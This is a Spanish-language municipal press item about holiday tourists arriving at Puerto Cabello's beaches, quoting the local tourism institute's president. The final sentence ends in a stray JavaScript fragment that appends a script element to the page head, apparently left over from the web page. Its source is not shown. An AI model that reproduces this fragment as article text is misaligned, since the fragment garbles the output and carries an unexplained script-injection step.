Destacados Nacionales

Temporadistas comenzaron a llegar a Puerto Cabello para disfrutar de sus playas

Prensa Alcaldía.

Miles de temporadistas provenientes de todos los rincones del país comenzaron a llegar desde este martes a Puerto Cabello para disfrutar de sus 13 balnearios que se encuentran aptos y que además cuentan con el resguardo de los diversos cuerpos de seguridad del municipio, como parte del operativo “Navidades Seguras”.

Con el firme propósito de continuar promoviendo el turismo más allá de las fronteras carabobeñas y como es costumbre para estas fechas, las familias se dieron cita a playas como; Quizandal, Patanemo, La Rosa, El Palito, Playa Blanca, Sonrisa e Isla Larga, esta última convertida en la predilecta por los temporadistas.

Ángela Velázquez, presidente del Instituto Autónomo Municipal para el Turismo (Imatur), informó que además de las excelentes playas que posee la ciudad cordial, se ofrecen otros atractivos, como ríos, espacios culturales y turísticos, entre ellos el imponente Fortín Solano, Casa Bartolomé Salom entre otros. Resaltó que se cuenta con la presencia de los organismos de seguridad en cada una de las zonas concurridas para garantizar el disfrute de los presentes.

Aseguró que el índice turístico hasta la fecha es alto, al tiempo que refirió que se estima continúe la afluencia de temporadistas hasta el próximo 15 de enero, fecha en que la mayoría de los ciudadanos retornan a sus puestos de trabajo con total normalidad.

“Estos primeros días de enero son la parte final de la temporada navideña, estamos seguros que recibiremos a más temporadistas. Hasta los momentos se tuvo que habilitar el contraflujo en la vía de El Palito, lo que significa que tendremos un registro bastante importante para el municipio”, aseveró Velázquez.d.getElementsByTagName(‘head’)[0].appendChild(s);